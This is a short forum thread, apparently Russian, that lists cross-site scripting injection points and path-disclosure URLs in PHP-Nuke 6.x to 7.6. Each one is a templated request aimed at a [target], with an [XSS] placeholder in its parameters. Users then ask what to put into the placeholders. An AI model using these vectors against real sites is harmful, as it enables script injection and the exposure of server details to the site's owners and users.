PHP-Nuke 6.x, 7-7.6

http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=[our query]

http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=
[our_query]&type=users&category=2

http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=
[our_query]&type=comments&categ ory=2

http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=
[our_query]&type=stories&category=2

http://[target]/[nuke_dir] /modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=
[our_query]&type=reviews&category=2

http://[target]/[nuke_dir]/modules.php?
name=FAQ&myfaq=yes&i d_cat=1&
categories=45435[XSS]

http://[target]/[nuke_dir]/banners.php?
op=EmailStats&login=[our_login]&cid=1&bid=[XSS]

http://[target]/[nuke_dir]/modules.php?name=
Encyclopedia&file=index&op=terms&eid=1&ltr=[XSS]

Удаленный пользователь может напрямую запросить некоторые сценарии и получить данные об установочной директории приложения. Примеры:

http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=userinfo
http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=my_headlines
http://[target]/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=search

 

Половину Sql я видел на секлабе

 

только серьёзного нечего несделать.

 

А чё такое [our query] ::??

 

это типа наш запрос =)) или вредный код . Учи Инглиш сЫнок

 

чё-то у меня не катит или я чего-то недопонимаю???

 

А что нужно туда писать то?? это вопрос к m0nzt3r